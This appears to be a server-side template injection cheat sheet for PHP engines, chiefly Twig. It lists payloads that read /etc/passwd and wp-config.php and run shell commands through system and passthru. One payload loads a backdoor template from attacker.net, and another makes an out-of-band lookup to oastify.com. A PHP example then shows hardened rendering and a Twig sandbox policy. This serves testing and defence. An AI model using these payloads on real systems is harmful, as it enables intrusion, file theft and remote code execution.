PHP
Templating Libraries
| Template Name | Payload Format |
|---|---|
| Blade (Laravel) | {{ }} |
| Latte | {var $X=""}{$X} |
| Mustache | {{ }} |
| Plates | <?= ?> |
| Smarty | { } |
| Twig | {{ }} |
Twig
Twig is a modern, flexible, fast, and secure template engine for PHP. It is widely used for creating dynamic and engaging user interfaces in web applications, offering a clear separation between presentation and business logic.
Basic Injection
{{7*7}}
{{7*'7'}} would result in 49
{{dump(app)}}
{{dump(_context)}}
{{app.request.server.all|join(',')}}
{{ _self }}
Arbitrary File Reading
{{ "/etc/passwd"|file_excerpt(1,-1) }}
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{include("wp-config.php")}}
Code Execution
{{self}}
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{['id']|filter('system')}}
{{[0]|reduce('system','id')}}
{{['id']|map('system')|join}}
{{['id',1]|sort('system')|join}}
{{['cat\x20/etc/passwd']|filter('system')}}
{{['cat$IFS/etc/passwd']|filter('system')}}
{{['id']|filter('passthru')}}
{{['id']|map('passthru')}}
{{['nslookup oastify.com']|filter('system')}}
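
The root cause behind every payload above is user input reaching Twig as template source. The following is an added example, not code from the original page or from the Twig project: it shows the vulnerable rendering pattern next to the hardened one, then a sandbox policy for cases where users must author templates. It assumes `twig/twig` 3.x installed via Composer; the template name `greeting`, the variable names and the allow-list contents are illustrative choices.

```php
<?php
// Added example, not from the original page. Assumes twig/twig 3.x via Composer.
require __DIR__ . '/vendor/autoload.php'; // assumed autoloader location

use Twig\Environment;
use Twig\Extension\SandboxExtension;
use Twig\Loader\ArrayLoader;
use Twig\Sandbox\SecurityError;
use Twig\Sandbox\SecurityPolicy;

// Constructed sample input: the arithmetic probe from "Basic Injection".
$userInput = '{{7*7}}';

$twig = new Environment(new ArrayLoader([
    // Fixed template source; user data only ever arrives as a variable.
    'greeting' => 'Hello {{ name }}',
]));

// VULNERABLE: input is concatenated into template source, so Twig parses
// and evaluates whatever expression the user supplied.
echo $twig->createTemplate('Hello ' . $userInput)->render(), PHP_EOL;

// HARDENED: the same input is passed as context data. It is escaped and
// printed as text; it is never parsed as Twig syntax.
echo $twig->render('greeting', ['name' => $userInput]), PHP_EOL;

// If users must write templates themselves, allow-list what they may use.
// Anything not listed (filter, map, reduce, sort, include, dump, ...) is refused.
$policy = new SecurityPolicy(
    ['if', 'for'],        // allowed tags
    ['escape', 'upper'],  // allowed filters
    [],                   // allowed methods (class => [method, ...])
    [],                   // allowed properties (class => [property, ...])
    []                    // allowed functions
);
$sandboxed = new Environment(new ArrayLoader());
// Second argument true: sandbox every template, not only {% sandbox %} blocks.
$sandboxed->addExtension(new SandboxExtension($policy, true));

try {
    // One of the "Code Execution" entries above, used here as a test case.
    $sandboxed->createTemplate("{{ ['id']|filter('system') }}")->render();
} catch (SecurityError $e) {
    // The filter is not on the allow-list, so Twig refuses to run the template.
    echo 'blocked: ', $e->getMessage(), PHP_EOL;
}
```

Keep the sandbox allow-lists as small as the feature requires, and leave the methods and properties lists empty unless a template genuinely needs a specific object member.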